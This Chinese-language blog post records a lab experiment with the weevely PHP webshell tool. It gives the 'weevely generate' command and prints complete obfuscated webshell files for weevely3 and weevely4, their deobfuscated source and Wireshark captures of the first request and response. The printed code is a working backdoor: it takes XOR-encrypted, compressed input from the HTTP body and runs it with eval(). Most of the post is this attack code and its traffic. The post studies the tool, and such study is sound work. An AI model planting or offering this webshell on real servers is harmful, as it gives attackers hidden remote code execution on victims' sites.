亲测php5和php8都无效，只有php7有效

ailx10

1949 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

上一次做weevely实验可以追溯到2020年，当时还是weevely3.7，现在的是weevely4 生成php网页木马依然差不多……

php菜刀weevely的简单实验19 赞同 · 3 评论文章​编辑

生成webshell文件的方式还是一样的

weevely generate ailx10 webshell.php

格式如下：

<?php
$k='=|=|(=|=|$j<$c&&$i<$l);$j++,$i++=|){$o.==|$=|=|=|t{$i}^$k{$j};}}return $o=|;}if =|=|(@preg_matc=|h=';
$o=str_replace('h','','chreahtehh_fhunhction');
$M='_end_clea=|=|n=|();$r=@=|bas=|e64_e=|ncode(@x(@=|gz=|compress($o),$=|k));print("$=|p=|$kh$r$kf");}';
$B=';func=|tion x($t,=|$k){$c=s=|t=|rlen($k);$l=s=|trlen(=|$t=|);$o=|=|="";for($i=|=0;$i<$l;){for=|($j=0;';
$g='$k="8=|3b70504";=|$kh="e=|0d8742=|dd5b6"=|;$k=|f="6e696=|2=|eb8a35";$p="=|6Dn1Vri=|K6eU=|iVd=|=|CB"';
$E='val(@gzuncom=|press=|(@x(@b=|=|ase64_decod=|e($m=|[1]),$k)=|=|));$o=@ob_get_=|con=|tents(=|=|);@ob';
$R='|("/$kh(.+)$=|kf/",@f=|=|ile_get_co=|ntents("=|=|php://in=|=|put"),$m)==1) {@o=|b_s=|tart();@=|e=|';
$v=str_replace('=|','',$g.$B.$k.$R.$E.$M);
$X=$o('',$v);$X();
?>

对比一下weevely3

<?php
$z='"a~;funca~tion x($a~ta~,$k){$c=a~strlen($k)a~;$la~=a~strlen(a~$t);$oa~a~="a~";for($i=0;$i<$l;){f';
$S='reg_matca~a~h("/$kh(a~.+a~)$kf/",@fa~ile_geta~_a~contents("a~pa~ha~p://inpua~t"),$m)==1){@ob_sa~';
$c=str_replace('K','','crKKeateK_fKunKKction');
$G='tart();@ea~val(@ga~za~uncompra~essa~(@x(a~@base6a~4_decoda~e($m[1]),$k)))a~a~;$a~a~o=@ob_ga~et_contents();a~@ob';
$X='_end_cleaa~n(a~);$r=@baa~se64_ena~ca~oa~de(@x(@gzcomprea~ss($o),$ka~));pa~a~rint(a~"$p$kh$r$kf");}';
$D='or($j=a~a~a~0;($j<$c&&$i<$l);$a~j++,$a~i++){$o.a~=$t{a~$i}^$a~a~k{$j};a~}}retua~rna~ $o;}if(@p';
$Y='$ka~="83ba~70504a~";$kh="ea~0a~d8742a~dd5b6";$kf="6a~e6962a~eb8a3a~5";$p="B1LWa~FZL8ia~ThxpsWa~b';
$g=str_replace('a~','',$Y.$z.$D.$S.$G.$X);
$e=$c('',$g);$e();
?>

wireshark 抓包分析，第一个http请求分析和应答分析

weevely3第一个http请求

 S3GQ#]g2:gmrV; e0d8742dd5b6QK8pev795wQMglKA5IE2NC/IYQ46e6962eb8a35g`,nMD4E DE0 {g(

weevely3第一个http应答

8mxY44h2cwP5HCvee0d8742dd5b6QK9RA4EFhzA4MHs2Pg==6e6962eb8a35

再来看一下weevely4

weevely4第一个http请求

kV8v2J'|Ww2q59QKe0d8742dd5b6QK8pev795wQMBtcD4IE2NC/sYQc6e6962eb8a351) _TH<qL"g#GObZ

weevely4第一个http应答

Crq5Lait6en1SFoOe0d8742dd5b6QK9RAwWABDQ4MG02NQ==6e6962eb8a35\n

weevely3代码分析，都是匿名函数

weevely3代码分析

$k="83b70504";$kh="e0d8742dd5b6";
$kf="6e6962eb8a35";$p="8mxY44h2cwP5HCve";
function x($t,$k)
{$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;)
{for($j=0;($j<$c&&$i<$l);$j++,$i++)
{$o.=$t{$i}^$k{$j};}}return $o;}
if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1)
{@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");}

weevely4代码分析，都是匿名函数

weevely4代码分析

$k="83b70504";$kh="e0d8742dd5b6";
$kf="6e6962eb8a35";$p="Crq5Lait6en1SFoO";
function x($t,$k)
{$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;)
{for($j=0;($j<$c&&$i<$l);$j++,$i++)
{$o.=$t{$i}^$k{$j};}}return $o;}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) 
{@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");}

发布于 2022-10-13 10:33